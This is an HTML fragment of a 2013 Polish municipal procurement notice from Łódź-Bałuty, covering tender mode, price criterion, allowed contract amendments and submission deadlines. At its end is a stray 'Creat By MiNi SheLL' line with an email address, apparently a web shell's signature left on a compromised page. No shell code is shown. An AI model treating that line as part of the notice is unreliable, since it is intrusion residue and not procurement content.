<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1 Istotne postanowienia , które zostaną wprowadzone do umowy oraz wszystkie     
       przyszłe zobowiązania wykonawcy zostały przedstawione we wzorze umowy  
       (załącznik nr 8 do SIWZ)
 16.2  Wykonawcy występujący wspólnie (np. w formie spółki cywilnej) ponoszą solidarną   
        odpowiedzialność za wykonanie umowy.
16.3  Zamawiający przewiduje istotne zmiany postanowień zawieranej umowy w stosunku 
       do treści oferty, na podstawie której dokonano wyboru wykonawcy:

   16.3.1  Zmianę okresu obowiązywania umowy z powodu okoliczności nieznanych  
             stronom w chwili zawarcia umowy.
   16.3.2  Zmian podmiotowych po stronie Wykonawcy zgodnie z obowiązującymi  
             przepisami prawa.
   16.3.3  Zmianę obsługiwanych nieruchomości wynikającą z przyczyn niezależnych od    
              Zleceniodawcy i nie znaną w chwili zawarcia umowy (np. zmiana stanu prawnego    
                        nieruchomości itp.)
		    16.3.4. zmianę ilości obsługiwanych nieruchomości ze względu na zmianę zarządcy,
               16.3.5. zmianę ilości (ilość metrów ,sztuk, msc.) ujętych w załączniku do      
                          umowy formularzu cenowym może ulec zmianie w trakcie trwania umowy . 
   16.3.5  Zmiany ustawowej stawki podatku VAT - cena zostanie obniżona lub  
             podwyższona o stawkę VAT wynikającą z przepisów.
16.3.7	Zmian w doprecyzowaniu zapisów umowy w przypadku powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony
    16.3.8 Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na   
              potrzeby  niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec  
              łączącej strony więzi prawnej:
o charakterze niezależnym od stron,
którego strony nie mogły przewidzieć przed zawarciem umowy,
którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
której nie można przypisać drugiej stronie;
	Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.baluty.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> przy ul. WIEKOPOLSIEJ 53 w Łodzi,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.12.2013 godzina 09:15, miejsce: Ofertę należy złożyć w Administracji Zasobów Komunalnych Łódź - Bałuty,  ul. Drewnowska 5, 91-002 Łódź, sekretariat, pokój Nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com